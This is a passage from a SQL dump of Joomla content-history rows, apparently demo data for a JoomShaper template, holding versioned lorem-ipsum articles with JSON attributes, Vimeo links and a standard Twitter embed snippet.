\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"status\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"<blockquote class=\\\\\\\"twitter-tweet\\\\\\\" lang=\\\\\\\"en\\\\\\\"><p>Published a new blog entry One Month Extra for all JoomShaper Members in News. <a href=\\\\\\\"http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8\\\\\\\">http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8<\\\\\\/a><\\\\\\/p>— JoomShaper (@joomshaper) <a href=\\\\\\\"https:\\\\\\/\\\\\\/twitter.com\\\\\\/joomshaper\\\\\\/status\\\\\\/562210375480139777\\\\\\\">February 2, 2015<\\\\\\/a><\\\\\\/blockquote>\\\\r\\\\n<script async src=\\\\\\\"\\\\\\/\\\\\\/platform.twitter.com\\\\\\/widgets.js\\\\\\\" charset=\\\\\\\"utf-8\\\\\\\"><\\\\\\/script>\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(10,71,1,'','2015-02-02 18:57:20',692,3565,'d515334bc8af0f508f8d49ed3f265247e6927098','{\"id\":71,\"asset_id\":\"195\",\"title\":\"Sed non bibendum urna lorem ipsum dolor sit amet, consectetur adipiscing elit\",\"alias\":\"sed-non-bibendum-urna-lorem-ipsum-dolor-sit-amet-consectetur-adipiscing-elit\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 18:56:08\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 18:57:20\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 18:56:08\",\"publish_up\":\"2015-02-02 18:56:08\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"status\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"<blockquote class=\\\\\\\"twitter-tweet\\\\\\\" lang=\\\\\\\"en\\\\\\\"><p>Published a new blog entry One Month Extra for all JoomShaper Members in News. <a href=\\\\\\\"http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8\\\\\\\">http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8<\\\\\\/a><\\\\\\/p>— JoomShaper (@joomshaper) <a href=\\\\\\\"https:\\\\\\/\\\\\\/twitter.com\\\\\\/joomshaper\\\\\\/status\\\\\\/562210375480139777\\\\\\\">February 2, 2015<\\\\\\/a><\\\\\\/blockquote>\\\\r\\\\n<script async src=\\\\\\\"\\\\\\/\\\\\\/platform.twitter.com\\\\\\/widgets.js\\\\\\\" charset=\\\\\\\"utf-8\\\\\\\"><\\\\\\/script>\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(11,71,1,'','2015-02-02 19:27:38',692,3506,'65f0cb164ef3547aea586502a546465a75009405','{\"id\":71,\"asset_id\":\"195\",\"title\":\"Sed non bibendum urna lorem ipsum dolor sit amet\",\"alias\":\"sed-non-bibendum-urna-lorem-ipsum-dolor-sit-amet\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 18:56:08\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 19:27:38\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 19:27:11\",\"publish_up\":\"2015-02-02 18:56:08\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"link\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"<blockquote class=\\\\\\\"twitter-tweet\\\\\\\" lang=\\\\\\\"en\\\\\\\"><p>Published a new blog entry One Month Extra for all JoomShaper Members in News. <a href=\\\\\\\"http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8\\\\\\\">http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8<\\\\\\/a><\\\\\\/p>— JoomShaper (@joomshaper) <a href=\\\\\\\"https:\\\\\\/\\\\\\/twitter.com\\\\\\/joomshaper\\\\\\/status\\\\\\/562210375480139777\\\\\\\">February 2, 2015<\\\\\\/a><\\\\\\/blockquote>\\\\r\\\\n<script async src=\\\\\\\"\\\\\\/\\\\\\/platform.twitter.com\\\\\\/widgets.js\\\\\\\" charset=\\\\\\\"utf-8\\\\\\\"><\\\\\\/script>\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"2\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(12,71,1,'','2015-02-02 20:27:55',692,3474,'83a23bb087b2f684a1a99ac8909d53860444eef9','{\"id\":71,\"asset_id\":\"195\",\"title\":\"Doner spare ribs pastrami shank\",\"alias\":\"doner-spare-ribs-pastrami-shank\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 18:56:08\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:27:55\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 19:44:14\",\"publish_up\":\"2015-02-02 18:56:08\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"status\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"<blockquote class=\\\\\\\"twitter-tweet\\\\\\\" lang=\\\\\\\"en\\\\\\\"><p>Published a new blog entry One Month Extra for all JoomShaper Members in News. <a href=\\\\\\\"http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8\\\\\\\">http:\\\\\\/\\\\\\/t.co\\\\\\/2pQYdykKy8<\\\\\\/a><\\\\\\/p>— JoomShaper (@joomshaper) <a href=\\\\\\\"https:\\\\\\/\\\\\\/twitter.com\\\\\\/joomshaper\\\\\\/status\\\\\\/562210375480139777\\\\\\\">February 2, 2015<\\\\\\/a><\\\\\\/blockquote>\\\\r\\\\n<script async src=\\\\\\\"\\\\\\/\\\\\\/platform.twitter.com\\\\\\/widgets.js\\\\\\\" charset=\\\\\\\"utf-8\\\\\\\"><\\\\\\/script>\\\"}\",\"version\":4,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"5\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(13,72,1,'','2015-02-02 20:29:50',692,2978,'2e634ee58bf5a238a9f23f8648ceb1740903121e','{\"id\":72,\"asset_id\":196,\"title\":\"Jerky shank chicken boudin\",\"alias\":\"jerky-shank-chicken-boudin\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>\\u00a0<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"video\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"http:\\\\\\/\\\\\\/vimeo.com\\\\\\/106306926\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(14,72,1,'','2015-02-02 20:31:04',692,3015,'dd4d438b486ad946a1e95cdd3e0fb3f6362dc0a0','{\"id\":72,\"asset_id\":\"196\",\"title\":\"Jerky shank chicken boudin\",\"alias\":\"jerky-shank-chicken-boudin\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>\\u00a0<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:31:04\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:29:50\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"video\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"http:\\\\\\/\\\\\\/vimeo.com\\\\\\/47505825\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(15,72,1,'','2015-02-02 20:31:45',692,3015,'d6a7362352a24b1ee69fcc4aa4377bf7d7de6c7a','{\"id\":72,\"asset_id\":\"196\",\"title\":\"Jerky shank chicken boudin\",\"alias\":\"jerky-shank-chicken-boudin\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>\\u00a0<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:31:45\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:31:40\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\